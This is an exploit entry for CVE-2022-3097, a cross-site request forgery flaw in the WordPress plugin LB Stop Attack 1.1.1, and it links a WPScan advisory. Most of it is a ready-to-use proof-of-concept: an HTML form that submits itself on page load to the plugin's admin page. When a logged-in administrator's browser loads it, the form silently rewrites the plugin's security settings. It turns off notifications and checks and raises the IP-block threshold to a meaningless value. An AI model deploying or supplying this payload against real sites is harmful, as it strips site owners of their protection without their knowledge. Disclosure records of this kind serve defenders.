CVE: CVE-2022-3097

Name: LB Stop Attack (lbstopattack)

Version: 1.1.1

Date: 2022-04-04 22:57:05

Advisory: https://wpscan.com/vulnerability/9ebb8318-ebaf-4de7-b337-c91327685a43

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/admin.php?page=lbsa_home" method="post">
    <input type="text" name="savelbsa" value="1">
    <input type="text" name="onlyfront" value="0">
    <input type="text" name="checkwp" value="0">
    <input type="text" name="namespaces" value="GET">
    <input type="text" name="levelLFI" value="50">
    <input type="text" name="sendnotification" value="0">
    <input type="text" name="sendto" value="">
    <input type="text" name="raiseerror" value="0">
    <input type="text" name="redirurl" value="https://google.com">
    <input type="text" name="errorcode" value="">
    <input type="text" name="errormsg" value="">
    <input type="text" name="ipblock" value="0">
    <input type="text" name="ipblocktime" value="222">
    <input type="text" name="ipblockcount" value="666666666">
</form>
<script>
    document.forms[0].submit();
</script>